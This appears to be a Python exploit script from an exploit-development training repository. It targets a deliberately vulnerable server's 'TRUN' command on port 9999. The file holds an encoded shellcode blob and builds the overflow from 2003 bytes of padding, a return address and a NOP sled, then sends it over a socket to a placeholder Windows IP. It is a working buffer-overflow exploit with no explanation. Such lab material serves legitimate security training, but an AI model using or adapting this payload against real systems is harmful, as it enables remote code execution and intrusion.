13-exploit-development/shellcode.py

#!/usr/bin/env python3
import sys
import socket

overflow = (b"\xbe\xab\xef\xc1\x62\xdd\xc6\xd9\x74\x24\xf4\x5f\x31\xc9"                                                                                                                           
b"\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xe1\x23\x97\xde"                                                                                                                           
b"\x16\x21\x58\x1e\xe7\x46\xd0\xfb\xd6\x46\x86\x88\x49\x77"                                                                                                                           
b"\xcc\xdc\x65\xfc\x80\xf4\xfe\x70\x0d\xfb\xb7\x3f\x6b\x32"                                                                                                                           
b"\x47\x13\x4f\x55\xcb\x6e\x9c\xb5\xf2\xa0\xd1\xb4\x33\xdc"                                                                                                                           
b"\x18\xe4\xec\xaa\x8f\x18\x98\xe7\x13\x93\xd2\xe6\x13\x40"                                                                                                                           
b"\xa2\x09\x35\xd7\xb8\x53\x95\xd6\x6d\xe8\x9c\xc0\x72\xd5"                                                                                                                           
b"\x57\x7b\x40\xa1\x69\xad\x98\x4a\xc5\x90\x14\xb9\x17\xd5"                                                                                                                           
b"\x93\x22\x62\x2f\xe0\xdf\x75\xf4\x9a\x3b\xf3\xee\x3d\xcf"                                                                                                                           
b"\xa3\xca\xbc\x1c\x35\x99\xb3\xe9\x31\xc5\xd7\xec\x96\x7e"                                                                                                                           
b"\xe3\x65\x19\x50\x65\x3d\x3e\x74\x2d\xe5\x5f\x2d\x8b\x48"                                                                                                                           
b"\x5f\x2d\x74\x34\xc5\x26\x99\x21\x74\x65\xf6\x86\xb5\x95"                                                                                                                           
b"\x06\x81\xce\xe6\x34\x0e\x65\x60\x75\xc7\xa3\x77\x7a\xf2"                                                                                                                           
b"\x14\xe7\x85\xfd\x64\x2e\x42\xa9\x34\x58\x63\xd2\xde\x98"                                                                                                                           
b"\x8c\x07\x70\xc8\x22\xf8\x31\xb8\x82\xa8\xd9\xd2\x0c\x96"                                                                                                                           
b"\xfa\xdd\xc6\xbf\x91\x24\x81\x7f\xcd\x7a\xd1\xe8\x0c\x82"                                                                                                                           
b"\xc0\xb4\x99\x64\x88\x54\xcc\x3f\x25\xcc\x55\xcb\xd4\x11"                                                                                                                           
b"\x40\xb6\xd7\x9a\x67\x47\x99\x6a\x0d\x5b\x4e\x9b\x58\x01"
b"\xd9\xa4\x76\x2d\x85\x37\x1d\xad\xc0\x2b\x8a\xfa\x85\x9a"
b"\xc3\x6e\x38\x84\x7d\x8c\xc1\x50\x45\x14\x1e\xa1\x48\x95"
b"\xd3\x9d\x6e\x85\x2d\x1d\x2b\xf1\xe1\x48\xe5\xaf\x47\x23"
b"\x47\x19\x1e\x98\x01\xcd\xe7\xd2\x91\x8b\xe7\x3e\x64\x73"
b"\x59\x97\x31\x8c\x56\x7f\xb6\xf5\x8a\x1f\x39\x2c\x0f\x3f"
b"\xd8\xe4\x7a\xa8\x45\x6d\xc7\xb5\x75\x58\x04\xc0\xf5\x68"
b"\xf5\x37\xe5\x19\xf0\x7c\xa1\xf2\x88\xed\x44\xf4\x3f\x0d"
b"\x4d")

shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 16 + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('your-windows-ip', 9999))
    s.send(b'TRUN /.:/' + shellcode)
    s.close()

except Exception as e:
    print("Error connecting to server:", e)
    sys.exit()